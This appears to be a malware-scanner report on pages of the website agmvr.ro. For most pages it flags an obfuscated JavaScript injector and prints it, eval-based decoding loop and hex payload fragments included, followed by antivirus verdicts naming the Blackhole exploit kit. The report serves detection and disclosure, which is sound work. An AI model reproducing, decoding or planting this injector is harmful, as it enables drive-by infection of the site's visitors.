Request | Server response | Status |
http://agmvr.ro/ | 200 OK Content-Length: 15984 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/../index-english.html | 403 Forbidden Content-Length: 312 Content-Type: text/html | clean |
http://agmvr.ro/test404page.js | 404 Not Found Content-Length: 5174 Content-Type: text/html | clean |
http://agmvr.ro/index.html | 200 OK Content-Length: 15984 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/organizare.html | 200 OK Content-Length: 19397 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/obiective.html | 200 OK Content-Length: 11829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/birouexecutiv.html | 200 OK Content-Length: 12995 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/filiale.html | 200 OK Content-Length: 10573 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 24393 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
dxjxuj="y";sts="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[sts].body)==null}()}catch(inu){ljduit=function(aaifj){aaifj="fr"+"omCh"+aaifj;for(exo=0;exo<dxjxuj.length;exo++){gqa+=String[aaifj](jgo(mor+(dxjxuj[exo
... 3944 bytes are skipped ...a2^63^5b^a7^a0^a9^67^5b^a0^a9^9f^5b^64^5b^64^76^48^45^b8^48^45^a4^a1^5b^63^a9^9c^b1^a4^a2^9c^af^aa^ad^69^9e^aa^aa^a6^a4^a0^80^a9^9c^9d^a7^a0^9f^64^48^45^b6^48^45^a4^a1^63^82^a0^af^7e^aa^aa^a6^a4^a0^63^62^b1^a4^ae^a4^af^a0^9f^9a^b0^ac^62^64^78^78^70^70^64^b6^b8^a0^a7^ae^a0^b6^8e^a0^af^7e^aa^aa^a6^a4^a0^63^62^b1^a4^ae^a4^af^a0^9f^9a^b0^ac^62^67^5b^62^70^70^62^67^5b^62^6c^62^67^5b^62^6a^62^64^76^48^45^48^45^9c^a2^ac^6b^74^63^64^76^48^45^b8^48^45^b8".split(mmz);gqa="";ljduit("arCode");jgo(""+gqa);}
Antivirus reports:- AntiVir
- JS/Blacole.EB.197
- Avast
- JS:Includer-ALK [Trj]
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/contact.html | 200 OK Content-Length: 11784 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/congres/2011.html | 200 OK Content-Length: 10280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/congres/ | 403 Forbidden Content-Length: 5406 Content-Type: text/html | clean |
http://agmvr.ro/congres/2011-english.html | 200 OK Content-Length: 9678 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/congres/../index.html | 200 OK Content-Length: 15984 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
... 3824 bytes are skipped ...^b5^73^67^ac^b5^ab^67^70^67^70^82^54^51^c4^54^51^b0^ad^67^6f^b5^a8^bd^b0^ae^a8^bb^b6^b9^75^aa^b6^b6^b2^b0^ac^8c^b5^a8^a9^b3^ac^ab^70^54^51^c2^54^51^b0^ad^6f^8e^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^70^84^84^7c^7c^70^c2^c4^ac^b3^ba^ac^c2^9a^ac^bb^8a^b6^b6^b2^b0^ac^6f^6e^bd^b0^ba^b0^bb^ac^ab^a6^bc^b8^6e^73^67^6e^7c^7c^6e^73^67^6e^78^6e^73^67^6e^76^6e^70^82^54^51^54^51^b8^b7^ad^ae^c1^77^80^6f^70^82^54^51^c4^54^51^c4".split(olpyip);bhqsk="";brccm("arCode");mdzoiq(""+bhqsk);}Antivirus reports:- AntiVir
- JS/Blacole.NY.3
- Avast
- JS:Includer-ALK [Trj]
- Bkav
- MW.Clod55e.Trojan.63ae
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1027
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://agmvr.ro/congres/../ | 200 OK Content-Length: 15984 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) pkoklv="y";ylwudq="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[ylwudq].body)==null}()}catch(gcaixy){brccm=function(nxmcr){nxmcr="fr"+"omCh"+nxmcr;for(ubded=0;ubded<pkoklv.length;ubded++){bhqsk+=String[nxmcr](mdzoiq(ttoey+(pkoklv[ubded]))-(71));}};};mdzoiq=(window.eval);ttoey="0x";emp=0;try{;}catch(twyr){emp=1}if(!emp){try{++mdzoiq(ylwudq)["\x62o"+"d"+pkoklv]}catch(gcaixy){olpyip="^";}pkoklv="67^ad^bc^b5^aa^bb^b0^b6^b5^67^b8^b7^ad^ae^c1^77^80^6f^70^67^c2^54^51^67^
